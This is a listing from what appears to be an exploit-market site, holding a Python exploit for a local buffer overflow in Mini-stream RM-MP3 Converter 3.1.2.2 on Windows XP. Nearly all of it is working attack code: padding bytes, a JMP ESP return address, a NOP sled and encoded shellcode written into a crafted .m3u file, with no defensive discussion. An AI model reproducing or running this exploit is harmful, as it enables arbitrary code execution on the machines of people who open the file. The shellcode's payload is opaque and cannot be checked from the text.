[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mini-stream RM-MP3 Converter v3.1.2.2 Local Buffer Overflow

Author
SkY-NeT SySteMs
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18030
Category
local exploits
Date add
10-04-2012
Platform
windows
# Exploit Title : Mini-stream RM-MP3 Converter  V 3.1.2.2 Local Buffer
OverFlow
# Author : [SkY-NeT SySteMs]
# Software Link : [http://mini-stream.net/rm-to-mp3-converter/download/]
# Version : [3.1.2.2]
# Tested on : [Xp Sp 2]
# Category : Local
# Code : Python
# Email : [skynet-systems@hotmail.il.co]
# WebSite : [http://sskynetsystems.blogspot.com/]
 
 
# !/usr/bin/python
 
import os,sys
 
header= "http://."
junk= "\x41" * 17416 # [A]
ESP = "\x13\x44\x87\x7C" # 7C874413 FFE4 JMP ESP
NOPS = "\x90" * 16
 
ShellCode =(
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce"
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62"
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e"
"\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e"
"\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b"
"\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd"
"\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f"
"\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a"
"\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96"
"\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35"
"\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93"
"\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9"
"\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b"
"\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01"
"\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce")
file = open("test.m3u","w")
file.write(header+junk+ESP+NOPS+ShellCode)
file.close()



#  0day.today [2024-11-14]  #